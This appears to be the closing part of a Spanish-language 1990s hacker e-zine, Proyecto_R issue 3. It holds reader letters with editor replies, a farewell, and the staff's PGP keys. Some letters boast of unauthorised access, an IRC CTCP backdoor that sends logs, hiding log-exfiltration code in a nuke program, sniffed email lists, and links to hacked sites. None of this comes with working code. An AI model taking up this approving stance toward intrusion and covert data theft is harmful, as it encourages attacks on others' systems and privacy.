la primera vez ke obtube algo sin permiso fue presisamente eso, un
apllet java, fue hace mucho tiempo, y ahora ke recuerdo bien, la
primera vez siempre es gratifikante.....
el logro de una tarde de kraneo....
jejejje
si la deduciste tu por tu kuenta super buena onda..
porke esa fue mi primera deduccion, y por la kresta ke me senti bien
....jejejej
una hormiga kuando sube una piedra es feliz
kuando un escalador sube el everest tambien se siente feliz
jejejej
todo inicio es tortuoso
esta onda es komo la droga...
ni te das kuenta kuando kada vez pides mas

---------------------------- PlaXiuS -------------------------------------
<:: Si el down del applets fue escrito por mi por transcurrida gratis .. de hecho
siempre lo hago pero se me ocurrio que podia ser interesante para la gente que
se esta iniciando en esto ::>
--------------------------------------------------------------------------

septimo comente:

en la aburridisima onda del irc
lo mas seguro ke experimente fue el bakdor del ctcp
antes ke el eskandoloso script.ini apareciera
unas pokas lineas y te envian el log del status
�akaso hay algo mas fino ke eso?
bueno klaro...
ocultar kodigo en c++
de un apetitoso nuevo nuke ke en verdad mande fondeado log en paketes
kamuflados a un destinatario preestablecido....
pero eso es merecido para irc?
yo kreo ke es tiempo perdido..
jejejejjeje
y ramos de la karrera tambien
jeje :(

---------------------------- PlaXiuS -------------------------------------
<:: Por aki hay uno bueno de IRC ..::>
--------------------------------------------------------------------------

ocho:
no se ke mas....les iba hacer un aporte pero se me olvido
si les interesa les puedo hacer llegar... algunos link
de paginas jakeadas...
onda la whitepower fbi y kosas gloriosas por el estilo....

9:
me despido...
super en buena onda...
ojala mis komentes les hayan sido de utilidad
igual kualkier interes de aporte estamos a su disposicion, en lo ke se
puedA y en lo ke el tiempo pueda.....

---------------------------- PlaXiuS -------------------------------------
<:: bueno manos a la obra este E-Zine esta abierto para todo el mundo ::>
--------------------------------------------------------------------------

pd:
�sabran hacer virus los argentinos?
�de donde es la minotauro?
loko saka esos chistes raciales....
somos todos sudamerikanos
todos no existimos

---------------------------- PlaXiuS -------------------------------------
<:: No son racistas los chistes amigo !!! como fueron los
argentinos pueden ser chilenos , peruanos lo que sea .. solo
es humor ...... Lo de los virus la verdad les tengo mucho respeto
a los argentinos .. creo que estamos a a�os luz de ellos en esta area
pero ya basta de HOAX .. que llenan nuestras casillas anunciando virus
fantasticos , Grande minotauro .... de hecho distribuimos a la minotauro
en nuestra pagina de textos tal como lo hacemos con JJF.. que lata que
haya dejado de salir ::>
--------------------------------------------------------------------------

�porke en la lista de mails snifeados no estaba el del
kapitan general?
�no tiene mail?

---------------------------- PlaXiuS -------------------------------------
<:: Como lo dije en el articulo .. nos llego por correo anonimo .. no sabemos quien lo
envio .. talvez es un log antiguo o talvez al viejo se le va en collera la tecnologia ::>
--------------------------------------------------------------------------

saludos...... mios y de mis kolegas

emecedos
iceman
lokopepe
spinaka
CaLaVeRa

aguante la R

�AuNke LLueva ....OjO EstaMoS aFUeRa !

---------------------------- PlaXiuS -------------------------------------
<:: Bueno que mas les puedo decir , el E-zine esta abierto para todo
aquel que quiera colaborar .. y si nuestros lectores creen que tenemos
desviaciones politicas o cosas por el estilo ,, dejaremos de entregar
el huevo de oro .... pero la verdad es que hacemos esto como un llamado
de atencion a todos akellos que atenten contra la gente , ya basta de huevadas
si para todos los a�os es la misma huevada .. tal como los espa�oles estan hasta
los cojones con la ETA-... nosotros estamso hasta la coronilla con estos giles.,
nuestros blancos van desde los facistas hasta los comunachos .. ya que todos
son cortados por la misma tijera .... Bueno gracias por sus apreciaciones
y pos vuetro apoyo ...Saludos ... AHH y la unica guerra que hemos declarado es
a LA PORNOGRAFIA INFANTIL !!!::>
--------------------------------------------------------------------------

___________________________________________skyller hackerstein :skyller@xxxxxxx]

Felicitaciones por tu iniciativa....

Soy un aciduo lector de la SET i me acabo de enterar de tu
existenci.... me gustaria saber mas informacion acerca del proyecto, si
es un grupo, cuando se formo... no se , y ademas en que te puede ayudar
un "newbie" en levantar el movimiento under en nuestro pais.

Bueno eso es todo por el momento, suerte y tira pa rriba.

P.D.: Te apoyo completamente en lo del premio huevo de oro... esta bueno
de la misma hua' de siempre :)

---------------------------- PlaXiuS -------------------------------------
<:: Pues muchas gracias ... por el apoyo , la verdad esto del huevo a
causado polemica , es cosa que leas el correo anterior .. Sobre Proyecto_R , es
solo un E-Zine .. no existe como grupo ni nada .. lo unico que queremos es comunicar
a la ecena Under de sudamerica .. y chilena por su puesto !!! sobre como colaborar
.. Veremos algo... ::>
--------------------------------------------------------------------------

______________________________________________________Pata666
<script language='JavaScript' type='text/javascript'>

</script><script language='JavaScript' type='text/javascript'>

</script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<script language='JavaScript' type='text/javascript'>

</script>

Hola chicos, felicidades por la revista el otro dia me baje los dos primeros
numeros que lei avidamente, me gusto francamente, solo decirles que no desanimen,
por ejemplo vieron los principios de S.E.T?�� Creo que ustedes empezaron mejor,
ahora solo deben de seguir con tanto empe�o como hasta ahora y poco�a poco mejoraran.

Si necesiatn algo comuniquen conmigo. aunque formo parte de RareGazz, con mucho gusto
escuchare sus sugerencias o propuestas, aqui tiene mi direccion
<script language='JavaScript' type='text/javascript'>

</script><script language='JavaScript' type='text/javascript'>

</script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<script language='JavaScript' type='text/javascript'>

</script> y
mi llave pgp por cierto tienen ustedes?? si no es asi seria muy considerable que la
empezaran a usar, por su seguridad, si quieren al uktima versions e puede conseguir
en www.pgpi.com <http://www.pgpi.com/>, ya saben donde contactar conmigo para lo que
quieran...

---------------------------- PlaXiuS -------------------------------------
<::Gracias por todo Amigo , la verdad admiramos mucho anuestros amigos de
Raregazz , nos han brindado un gran apoyo , solo que no estamos en contacto
directo pues ... recien estamos empezando .. y aun estamos bastante desorganizados
... pero para ya vamos , sobre el pgp ya estamos al dia no lo habiamos adoptado
pues creiamos que no era necesario ya que normalemte no tenemos contactos o
informacion delicada ... hasta que nos llego el log!!! ::>
--------------------------------------------------------------------------

__________________________________________________ Kafun :
<script language='JavaScript' type='text/javascript'>

</script><script language='JavaScript' type='text/javascript'>

</script>Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
<script language='JavaScript' type='text/javascript'>

</script>

Me gusto mucho su revista, sigan asi, los wannabes del
mundo lo agradeceremos, por cierto, soy buen traductor, o
eso creo, tal vez les podria ayudar, de todas formas si
necesitan a alguien que les ayude a hacer algo, llamenme

Por el momento es todo, bye

==================================================
KAFUN A.C.
home page: http://www.geocities.com/pentagon/quarters/6861‰

==================================================

---------------------------- PlaXiuS -------------------------------------
<:: Gracias kafun por tus apreciaciones .. y si quieres colaborar es cosa
de que te decidas .. y a trabajar::>
--------------------------------------------------------------------------

_____________________________________________________________ Mate Swichman

Muy bueno Proyecto R - sigan as�, recien hoy acabo de leer el numero 1
Ya comienzo con la 2

Y respecto al punto 6 .- Chistes , bromas , y cualquier burrada que se te
ocurra .
SOBRE LOS ARGENTINOS, estoy de acuerdo, pero eso solamente se le aplica a
los porte�os. Buenos Aires.... ;-)
Contin�en, no le aflojen....

---------------------------- PlaXiuS -------------------------------------
<:: Bueno nuestro amigo Mate se nos ha unido y se encargara de ahora en adelante
de la seccion News que tenemos aca ... BacKDoorS ::>
--------------------------------------------------------------------------

____________________________________________________________ Rocket_far@xxxxxx

�Hola Plaxius!, espero que estes bien, te quiero agradecer m�s que
nada por tratar de hacer cambiar este pais tan hermoso pero tan
corrompido a la ves. Dejame felicitarto por el buen e-zine que has
logrado crear y quiero darte aliento y todas mis fuerzas para que la WEB
de todos, (haci lo siento yo), salga adelante como para solamente
premiar tu gran esfuerzo. Bueno queria pedirte un gran favor, espero que
no te moleste, mira necesito saber como se utiliza bien el "erect97" y
necesito saber tambien si me puedes dar una dire de lo ke sea para bajar
el programador c o algo asi.
Bueno espero que este insignificante e-mail pueda servir de algo ya
que no le pego mucho ni al hack ni al phrehack, (solo soy un novatin
bien novato sorry), pero si necesitas algo no baciles en mandarme un
e-mail ya sea programa o cualquier otra cosa. Ha llegado la hora de
despedirme bueno viejo tira pa'riva y que todo funcione como debe.
Se despide atte. un fiel lector de proyecto_R.

PD: Espero una repuestita, la mayoria de las veces me conecto al iRC con
el nick: Fuck.

---------------------------- PlaXiuS -------------------------------------
<:: Gracias Amigo por vuestra apreciacion .. pero el E-Zine es un esfuerzo de
varias personas .. como TAkER , AnDyK , y Mate que son parte del Staff "extraoficial"
y del resto de las personas que han deseado colaborar con su aporte .. Sobre el Ercet97
las intrucciones aparecen al momento de ejecutarlo bajo una ventana DOS ,,, sale el
listado de opciones .... Sobre un compilador .. que creo que es lo que necesitas ..
si trabajas en DOS y quieres aprender el lenguaje y compilar .. algunos programas
(no te funcionaran todos ya que la gran mayoria que aprecen en E-Zine y paginas web son para
LINUX ).. Bajate o consiguete por ahi el TC ( turbo C) .. si quieres compilar ..trae un
TCC que funciona bastante parecido al GCC ... y opciones varias ,.. Make ETc... Pero
te recomiendo .. utilizar linux .. si necesitas una copia en CD ... ponte en contacto y
veremos que `podemos hacer ::>
---------------------------------------------------------------------------

~~~~~~~~~~~~~~~~~~~~
# #
# 12.-ShutDown #
@ #
~~~~~~~~~~~~~~~~~~~~

________________________________________________________________________ By Proyecto_R

Bueno se�ores se termino Proyecto_R numero 3 ... y .. la verdad es que estamos dando todo
lo que tenemos ... y aunque nos falte tiempo .. por que la verdad el tiempo es nuestro gran
dilema , en este momento son las 3 de la madrugada del dia 20 de septiembre ; deberia estar
en alguna fonda tomando chicha o comiendo anticuchos .. pero como buen fanatico estoy
parado al frente de mi penqium 75 .... Bueno nuestro amigo TAkER nos promete para la
proxima edicion alguna cosita sobre AS/400 de IBM .. guauuu !!!es increible ... ahora que
me acuerdo mm podriamos darle fuerte a IBM .. pues algo recuerdo !!! vamos a ver si hacemos
algo en conjunto .... Seguiremos con algo de Linux ... de SQL ... de ASM .. de Novell..y
como configurar un marathon ,,y de lo que podamos conseguir como colaboracion o si tu quieres
escribir algo .... aki estamos .. listos para apuntar tus escritos en este magazine .. que
les aseguromtiene cuerda para rato ... ALGUNAS NUEVAS SORPRESAS DE NT ...
Queremos agradecer a todos nuestros fieles lectores ... y a toda la esena Under de habla
hispana que nos ha brindado su apoto .... Gracias al Conde Vampiro de JJF/HAKCERS TEAM por
sus apreciaciones ... por nuestros amigos de RAREGAZZ que son con los cuales tenemos mas
contacto ... a SET por darnos su apoyo y reconocernos en su E-Zine ... A todos los que nos
permitieron publicar sus articulos en este E-Zine , Esperamos que se entusiasmen con la
idea y que se transformen en colaboradores cosntantes de este magazine !!! Gracias
por todas vuestras muestras de apoyo ya que son gracias a ellas que nos dan ganas de seguir
trabajando y vemos que todo nuestro esfuerzo no es en vano ... La verdad es bastante cansador
ya que aparte del E-Zine .. tenemos otras cosas que hacer .. como trabajar estudiar .. etc..
Pero aki estamos dandole duro y con todas las ganas de continuar este proyeto para perpetuar
algun dia ... el Nombre de "Proyecto_R" en vuestras mentes y corazones (ya le puse color...
sniff me puse sentimental buaaaa !!) Bueno nos los lateo mas ... y los dejamos ..

Suerte y hasta el Numero 4 .

AnDyK
Mate Swichman
PlaXiuS
TAkER

~~~~~~~~~~~~~~~~~~
# #
#13.-Llaves PGP #
# #
~~~~~~~~~~~~~~~~~~

"Andyk"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQGiBDU9aLkRBADoUXcl/ik5spWNFIFOaP8O+3CGcfCC9ZROrj0VkFDAm3OqpkSa
2OhNQWeABvQCefbWrd8OnfMTO8AZRKe+9LfAit4cXLmgO2rywaxjP00kaUAdR7E+
GMxoVjqe8QxsYhfkV7Ea1UyPdkKR8l3X16djQF+AmdcnBEbIrmCubXfcYQCg/4AX
UPKGB4F7ukNSWD5zYjopwOUEAM613o4STs8H3nBo24VmRkyzOTWinr+5qqGL8Zjt
IlBjzVdMVk8mqP0Shly7tfhaSJioyoYJ6XCM1VJISgFnYRGbufEymsPwZeOBekjO
w7eec3m3evvH8avOm8rzKCejrlNxpuR9u+0oB9K3IbQ4eeBfl+1TBcZdomgBN26O
InLUA/901qYlUv+vNhvhCcsuYEKjpDTB22E4lELOfVOMDMgSNJfffNOe4i6P2k5C
5otHMDd54eKNKIdkcAD5i3gS7MpAOvzyZPyTc5HxAp6BJ4AS0Bd3gYrR0Vw3PlhB
oYnx884fhI7+6i1rMkVLo5HDj+HS54mHgGhxmd9Z4ZXgwBWIirQdYW5keWsgPGFu
ZHlraGFja0Bob3RtYWlsLmNvbT6JAEsEEBECAAsFAjU9aLkECwMCAQAKCRAr1PJm
+IR2IqvkAJsEibSuMHHJGggSEoHodhPT5XHI9gCgimehq0XEh7Bl2wBkmTFyxDI1
aP65AQ0ENT1owRAEAPqZDQ2eNtWYgXMWbf9rnMIOWeKlYbrlzoKsWRYPIroWmuLg
d/LmOn8Nv/AeX0wv1BHM6gpXzGzbrRPMmXseENJVVH/4QKEHVRJuTP5dyPk9hPsL
NWEP8dUdRgTQ26Q6jrQ6xHI5kc6nv0Ts9CqKLmJLGxN/YM/q1WAhE1LNbzHDAAIC
BADv904kLc2lkz0MTich/gPwZ5hjhfb+nnIhx54FybDgE2JiaLfz+cmVyYp5lr48
0Aivnaqu7epgugJW/d9fE3qQpQlJU0Q/iu96tLcxCFT6dN1iN3er6nigN1V+EAss
ieExncgISiMYCisVtj9Tl2aMQJtfMrL52ulwg4ixURJxfIkARgQYEQIABgUCNT1o
wQAKCRAr1PJm+IR2IkqMAJsHpv3nsHS3mFhzgbDhjKoIcqV8xgCgqpLdN5zv4YK1
Ykziq7a1AaGPJkk=
=thoZ
-----END PGP PUBLIC KEY BLOCK-----

"TAkER"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQGiBDXoYvURBAD3l/qQQNuJhnI2yqng0Cn1cpyUTEVZz002kJxKjnr6PB3432LT
hhX1bnKDU6bMP0ZP+r9Ti/yScWb1nBTI0YvEEDbPqoUFi0we02efZr/4iD7GmXY9
4Y8K5OunkuPp3z471hI1YvQYfvbXBqZwAFOK6BKGJ+onAbAuTCrTeJT1VwCg/55R
p4+JwXOQkR5mHH0LvCKvgbMD/j2S9Kk1lN58hc6wDCZI7/h2CDR4ijpkLrw857lm
NazENwyYgP2Zgohd7OhD4oVt5uAhG/rE+mhTDvo3FytkfnlBBFdus0ebEHjxwo19
0oTzV+qnuc87or/kTxxaRJeFxSwRMSLEHrjeh/yiH6JuDXOvM+KSebIBptfjKaci
bv3XA/9SXB0z8Bdz1sv+JwbLFfzByM1YvpESVVbB+D1fVJaV2lHhONQhUVbQxAf1
Ja3aUTNkSWCVWzCwwQBkMudFkafKYd8Q0uNKQAaUV65Ac5VKLJ6RjFWGkuAH7dmo
BAF0/tD7X6Qx4iiiWWneqhgBfqayEPkUGZORNoCgMDJ8UzyyMrQdVEFrRVIgPHVf
dGFrZXJAZ2VvY2l0aWVzLmNvbT6JAEsEEBECAAsFAjXoYvUECwMCAQAKCRCu4pU2
X//y5cg6AJ9BZxR1mwXME4JPeUBmr/k+EvWN6ACfTdXyoaVd8S/PI0ko289zhtUD
i9K5Ag0ENehi9RAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU
6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN
/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9
WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0
/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQ
mwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIIAPAkA85nKPBaA/ZYy52X
GSXykTrhespAxbjjZf7efZtHzxyG/i1cdcGAYtLSoRcwOOl+AjEtem9Z+YOvmVyR
aBpvra81cu1xdF1vZmmWQMGEag9mlgIcwI0eiHLrjBFZToYCaZY7kaC1d+0ZgAx4
rQsznVEJRqXdxO5PJmrvJTe/vFNtTvlycWA5zO+GaVCK4BTAjB+rDHG36fXEkUR+
DHdVYCTi3OOjgsLlFJfS0ZbkhbD7J9d0cGpc0V7JRMOF+zQJ75oLrPuGOXxTaQEC
EkLnoQ3ZGFwwzCCY1mg3Rnq+vUZQwV/aZAS13Qrv3iMavyAWUwIf8kDoMlEO9bth
lt+JAEYEGBECAAYFAjXoYvUACgkQruKVNl//8uUDHgCZARzPG0F0sddKUXIZljd5
+iMkjssAoPj3I/L+ykf8As5hQY43fB/qQjK5
=z+o+
-----END PGP PUBLIC KEY BLOCK-----

"PlaXiuS"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>

mQENAzXQft8AAAEIAMEHngCERPQxki4D8A41ywn2NiUVkpOVF/LTQ5wOLBMm/2Xs
RYEtFXvOpwyL+JYunY6QIcSmCGgAsrDZBV2pBFdzVENzMeiKhfIBWhBB9H9Q+Tkw
7ps88fenespdw1QEVFxXkRtGnqNTOZAK7o987BRCiCSGDDZ9Plrg48tO8jM3R/tG
4LEKgXqqWJnvqY22iYgwZpMSBt7JhRZ3eUxKSeTEInOr8BtIljbRRArHETqGOAjy
dTkZUEPbEw+On2OPDcQm25WHq8/WjMAcPL+k28m4KsbY7b9GywcfwWH6PhjcgDvF
UvGi+auahjept9aFtn/fEqU6yLtoxPsnRpY3lOEABRG0HVBsYVhpdVMgPHBsYXhp
dXNAYmlnZm9vdC5jb20+iQEVAwUQNdB+38T7J0aWN5ThAQH1SQf/bvltiOQprsq1
LwqRUt3lkuZaDHNKfjYz8mJpv5dPzJ+X4uI9cKauC2L8WFYGeb+KVI6nfb+VRr+T
coG8CKCaGIEaYISoatetDN2IjvgUrXc7FxzlUXotMC+MZLZOWxnd3+J78dO/T0zC
OgteCdi5nZYfIJJooUObQ01PcgEG7hmyjGUGCtBIoyzbXdJAJN7jzBZYviq5MATB
oOZSI4W433kw6wwZcvaLsDZVo6frhsqllYEwhK4lTrxyeC0f+fk25hT63d2YLprr
u4LFsTtvpze7K/856UifF1Er4WBRtQ+ZEAsqKQXPD64gtaF82IJ9FFLLJBIPpoeU
OfrQ87c5Ow==
=bweu
-----END PGP PUBLIC KEY BLOCK-----<BR /></PRE></td>
</tr>

</table>
<span class="article_separator"> </span>

</td>

</tr>
</table>

</div>
<div class="clr"></div>
</div>
<div class="clr"></div>
</div>

</p>
<p id="power_by">
Potenciado por <a href="http://www.joomla.org">Joomla!</a>.
Valid <a href="http://validator.w3.org/check/referer">XHTML</a> and <a href="http://jigsaw.w3.org/css-validator/check/referer">CSS</a>.
</p>
</div>
</div>
</div>
</div>
</div>

</body>
</html>

Ultimos Mensajes del Foro

Manuales recientes

Manual Aleatorio

Webs Amigas

Noticias recientes

Menu de Usuario

Encuestas